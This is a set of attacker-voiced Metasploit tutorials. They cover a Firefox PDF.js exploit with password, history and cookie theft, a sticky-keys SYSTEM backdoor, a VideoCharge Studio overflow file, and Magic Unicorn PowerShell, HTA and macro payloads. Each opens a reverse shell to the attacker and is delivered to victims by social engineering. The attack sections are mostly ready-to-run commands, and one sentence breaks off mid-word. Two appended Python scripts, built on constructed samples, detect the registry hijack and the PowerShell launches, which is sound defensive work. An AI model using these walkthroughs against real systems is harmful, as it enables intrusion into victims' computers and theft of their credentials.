Hack Remote PC using Firefox PDF.js Privileged Javascript Injection

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets
Firefox 35-36
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/multi/browser/firefox_pdfjs_privilege_escalation and set the options as shown:
msf exploit (firefox_pdfjs_privilege_escalation)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_pdfjs_privilege_escalation)>set lhost 192.168.0.121 (IP of Local Host)
msf exploit (firefox_pdfjs_privilege_escalation)>set srvhost 192.168.0.121
msf exploit (firefox_pdfjs_privilege_escalation)>set uripath /
msf exploit (firefox_pdfjs_privilege_escalation)>exploit


The module now serves the exploit at a URL you give to the victim: http://192.168.0.121:8080


Send the link to the server to the victim via chat, email, or any other social engineering technique.

When the victim opens the link (http://192.168.0.121:8080), a page like the one shown below is displayed. The exploit fires only when the victim manually clicks on the "click here" option.


Now a session will be opened as shown below.


If you want to gather the user passwords stored in the Firefox browser, use the following commands.
Now type use post/firefox/gather/passwords
msf exploit (passwords)>set session 1
msf exploit (passwords)>exploit

After running the privileged JavaScript, the module prints the path where the gathered passwords are saved.


Now open that file to read the user names and passwords stored in the Firefox browser.


To see the Firefox browsing history, run the post module given below.
Now type use post/firefox/gather/history
msf exploit (history)>set session 1
msf exploit (history)>exploit


After running this module, go to the path where the history entries are stored; the file lists the URLs visited by the victim.


To gather the browser cookies, run the post module given below.
Now type use post/firefox/gather/cookies
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit  


The above module saves all cookies in the folder it reports. Open that folder and click on the cookies file to view the cookie information.

Windows 7 Sticky Key Hack Attack using Metasploit


Today we will learn how to extract login credentials from a victim who is running a Windows system. Using this technique, we can see the credentials in plain text.
Table of Content:
- Introduction to sticky_keys module
- Achieve Meterpreter on Remote System
- Using sticky_keys module

Requirements:
- Attacker: Kali Linux
- Target: Windows 7
Introduction to sticky_keys module
This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog.
The module modifies the Debugger registry setting (under Image File Execution Options) for certain executables. The module options allow this hack to be applied to:
- SETHC (sethc.exe is invoked when SHIFT is pressed 5 times)
- UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U)
- OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard)
- DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P)
The hack can be added using the ADD action and removed with the REMOVE action. Custom payloads and binaries can be run as part of this hack, but they must be uploaded to the target manually before running the module. By default, a SYSTEM command prompt is installed using the registry method if the module is run without changing any parameters.
Achieve Meterpreter on Remote System

Open a Kali Linux terminal and type msfconsole to load the Metasploit framework. We first need to compromise the victim's machine once to obtain a session, either meterpreter or shell; to do so, you can read our previous article from here.
Using sticky_keys module
After getting meterpreter on the remote system, it is time to use the post exploitation module. This cannot be done from inside the meterpreter shell, so we use the background command in the meterpreter session (or the "Ctrl + z" shortcut) to keep the session in the background. Now follow the steps shown in the image to use the sticky_keys post exploitation module.
use post/windows/manage/sticky_keys
set session 5
exploit

This uses the registry_createkey command to edit the registry on the remote system so that cmd.exe is launched in place of sethc.exe. The next time sticky keys is invoked, instead of the sticky keys prompt we get a command prompt running as SYSTEM. The useful property of sticky keys is that it can be invoked on the login screen without entering a password, as shown in the image.
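Because the module's default method leaves a Debugger value under Image File Execution Options for one of the four accessibility binaries listed above, that value is the artifact a defender should audit for. The script below is an added example, not code from this article or from the Metasploit module: it parses a `.reg` text export of the IFEO key and flags Debugger entries on sethc.exe, Utilman.exe, osk.exe and DisplaySwitch.exe while ignoring legitimate developer debuggers on other programs. The registry export embedded in it is constructed for the demonstration, including the `payload.exe` path.

```python
"""Audit an Image File Execution Options (IFEO) export for the accessibility
debugger hijack used by the sticky_keys module. Added example; not code from
the article or from Metasploit. It parses the text format written by
`reg export` (a .reg file), so it runs offline against the constructed sample
below. On a live host, export the key first and read the file as UTF-16:
    reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg
    find_debugger_hijacks(open("ifeo.reg", encoding="utf-16").read())
"""
import re

IFEO_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
            r"\Image File Execution Options")

# The four executables the sticky_keys module can target (from the article).
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "displayswitch.exe"}

# Constructed sample export: one legitimate developer debugger (notepad.exe),
# two hijacked accessibility binaries, and one unrelated IFEO value.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\windbg.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe]
"MitigationOptions"=hex(b):00,01,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe]
"Debugger"="C:\\Users\\Public\\payload.exe"
"""


def parse_reg_export(text):
    """Return {subkey_name_lower: {value_name: value}} for the IFEO subkeys
    found in a .reg export. Only the subkeys directly under IFEO matter here."""
    prefix = (IFEO_KEY + "\\").lower()
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            if path.lower().startswith(prefix):
                current = path[len(prefix):].lower()   # e.g. "sethc.exe"
                keys[current] = {}
            else:
                current = None                          # the IFEO key itself, or foreign
            continue
        if current is None:
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if not m:
            continue                                    # "@=" defaults, comments, continuations
        name, value = m.group(1), m.group(2)
        if value.startswith('"') and value.endswith('"'):
            # REG_SZ values: .reg files escape backslashes and quotes with a backslash
            value = value[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        keys[current][name] = value
    return keys


def find_debugger_hijacks(text):
    """Return sorted (executable, debugger) pairs for accessibility binaries
    that have a Debugger value set. Any such entry is a red flag: none of the
    four ships with a debugger configured."""
    hits = []
    for exe, values in parse_reg_export(text).items():
        debugger = values.get("Debugger")
        if debugger and exe in ACCESSIBILITY_BINARIES:
            hits.append((exe, debugger))
    return sorted(hits)


if __name__ == "__main__":
    for exe, debugger in find_debugger_hijacks(SAMPLE_REG_EXPORT):
        print(f"HIJACK: {exe} -> {debugger}")
```

The check only covers the registry method the article describes as the default. If sethc.exe itself has been overwritten with a copy of cmd.exe instead, the registry is clean, and the binary's hash has to be compared against a known-good copy of the same Windows build.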

Hack Remote Windows PC using Video Charge Studio Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.

Exploit Targets
VideoCharge Studio 2.12.3.685

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/windows/fileformat/videocharge_studio
msf exploit (videocharge_studio)>set payload windows/meterpreter/reverse_tcp
msf exploit (videocharge_studio)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (videocharge_studio)>exploit


After the malicious .vsc file is generated, it is stored on your local computer at:
/root/.msf4/local/msf.vsc


Now we need to set up a listener to handle the reverse connection the victim's machine makes when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit

Now send the msf.vsc file to the victim. As soon as they download and open it, you get a meterpreter shell on the victim's computer.


Magic Unicorn - PowerShell Downgrade Attack and Exploitation tool


Magic Unicorn is a simple tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Table of Content
- PowerShell Attack Instruction
- HTA Attack Instruction
- Macro Attack Instruction
Download unicorn from its git repository:
git clone https://github.com/trustedsec/unicorn.git
Once downloaded, change into the directory and run unicorn with the following command to see all the available methods.
./unicorn.py

POWERSHELL ATTACK INSTRUCTIONS
First we will try the reverse_tcp payload. As we can see in the main menu, all the commands are already written; we only need to replace the IP with our own.

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444

This gives us two files. One is a text file named "powershell_attack.txt" containing the PowerShell code that will be run on the victim's machine through social engineering; the other is "unicorn.rc", a custom Metasploit resource file that automatically sets all the parameters and starts a listener.


These files are saved in the directory where unicorn was cloned. powershell_attack.txt holds the malicious code; when the victim executes that code in their command prompt, the attacker receives a reverse connection from their machine.

Now let's set up the listener first. We run the Metasploit "unicorn.rc" file using the following command:
msfconsole -r unicorn.rc

We see that a meterpreter session was obtained. This happened because the PowerShell code was executed in the victim's command shell, which would have looked something like this:


HTA ATTACK INSTRUCTIONS
For our next attack, we will be using an HTA payload.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 4455 hta


Now convert your IP into a bitly URL, send it to the victim, and wait for the user to click on the "launcher.hta" file, which can be arranged easily using social engineering.

So we next set up a Metasploit listener using the RC file and wait for the user to click on the HTA payload.
msfconsole -r unicorn.rc



As soon as the user opened the file, we received a meterpreter session.
We checked the system information using the sysinfo command.

MACRO ATTACK INSTRUCTIONS
Now for the third and final payload of this tutorial, we turn to our beloved macros.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 443 macro


This again creates a text file and an rc file with the same names in the same location.

There are various ways to enable developer mode, depending on your version of MS Office.
As a generic approach, let's say you enabled it like this:
File->properties->ribbons->developer mode

Once it is enabled, you will see an extra tab labeled Developer.
For the attack, go to Developer->Macros and create a new macro named "Auto_Open".

Simply paste the contents of "powershell_attack.txt" into this module of the xlsx file and save it.


As soon as you click Run (the little green icon at the top), it gives you an error. Don't worry: you want that error; it is supposed to happen.

Soon after the error on the user screen, we would have obtained a session successfully in meterpreter!
Use sysinfo double check our successful exploitation using un
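All three Unicorn launchers described above (the pasted PowerShell command, the HTA file and the Auto_Open macro) end in the same place: a powershell.exe process started with a hidden window, the 2.0 engine requested by the downgrade, and usually a base64-encoded command, spawned by cmd.exe, mshta.exe or an Office application. The script below is an added example, not code from this article or from the Unicorn project: it scores process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) for exactly those traits and decodes any UTF-16LE base64 command so an analyst can read it. The four records it scans are constructed for the demonstration, including the harmless encoded command.

```python
"""Flag PowerShell launches matching the downgrade / hidden / encoded pattern
that the Unicorn launchers rely on, plus Office or mshta.exe parents. Added
example; not code from the article or from Unicorn. Records are dicts with
the Sysmon Event ID 1 field names ParentImage, Image and CommandLine; the
sample events below are constructed, not captured from a real host.
"""
import base64
import re

# Parents that normally have no reason to spawn PowerShell: the HTA launcher
# runs under mshta.exe, the macro launcher under an Office application.
SUSPICIOUS_PARENTS = {"mshta.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed, harmless encoded command so the decoder has something to show.
_ENCODED = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed records: one benign, then one per launcher type
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": POWERSHELL,
     "CommandLine": "powershell -nop -w hidden -version 2 -noni -e " + _ENCODED},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE", "Image": POWERSHELL,
     "CommandLine": 'powershell /w 1 /C "sv a -;sv b ec;Write-Host x"'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": POWERSHELL,
     "CommandLine": "powershell -NoP -W Hidden -Exec Bypass -C Write-Host y"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _switch_matches(token, full_name, min_len=1):
    """powershell.exe accepts '-' or '/' prefixes and any unambiguous prefix of
    a switch name (-w, -win, -windowstyle), so match on prefix, not equality."""
    if token[:1] not in "-/":
        return False
    name = token[1:].lower()
    return len(name) >= min_len and full_name.startswith(name)


def analyze_event(event):
    """Return a finding dict for a suspicious PowerShell launch, else None."""
    if _basename(event["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    toks = re.findall(r'"[^"]*"|\S+', event["CommandLine"])
    reasons, decoded = [], None
    for i, tok in enumerate(toks):
        nxt = toks[i + 1].strip('"') if i + 1 < len(toks) else ""
        if _switch_matches(tok, "version") and nxt.startswith("2"):
            # The downgrade itself: the 2.0 engine has no AMSI and no script block logging.
            reasons.append("PowerShell 2.0 engine requested (no AMSI, no script block logging)")
        elif _switch_matches(tok, "windowstyle") and nxt.lower() in {"hidden", "1"}:
            reasons.append("hidden window")               # -w hidden or the numeric /w 1 form
        elif _switch_matches(tok, "noprofile", 3):
            reasons.append("profile skipped")             # -nop: min_len 3 avoids matching -noni
        elif _switch_matches(tok, "encodedcommand") and len(nxt) >= 8:
            try:
                decoded = base64.b64decode(nxt, validate=True).decode("utf-16le", "replace")
                reasons.append("base64-encoded command")
            except (ValueError, UnicodeDecodeError):
                pass                                      # not really base64, ignore
    parent = _basename(event["ParentImage"])
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    if not reasons:
        return None
    return {"parent": parent, "reasons": reasons, "decoded": decoded}


def scan(events):
    """Analyze every record and keep only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["parent"], "->", "; ".join(finding["reasons"]))
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
```

The benign first record (explorer.exe running a script file with no switches) produces no finding, while each of the other three is flagged for a different combination of traits. Disabling the PowerShell 2.0 engine (the Windows PowerShell 2.0 optional feature) removes the downgrade path the first two indicators describe; the parent-process rule still catches the HTA and macro launchers afterwards.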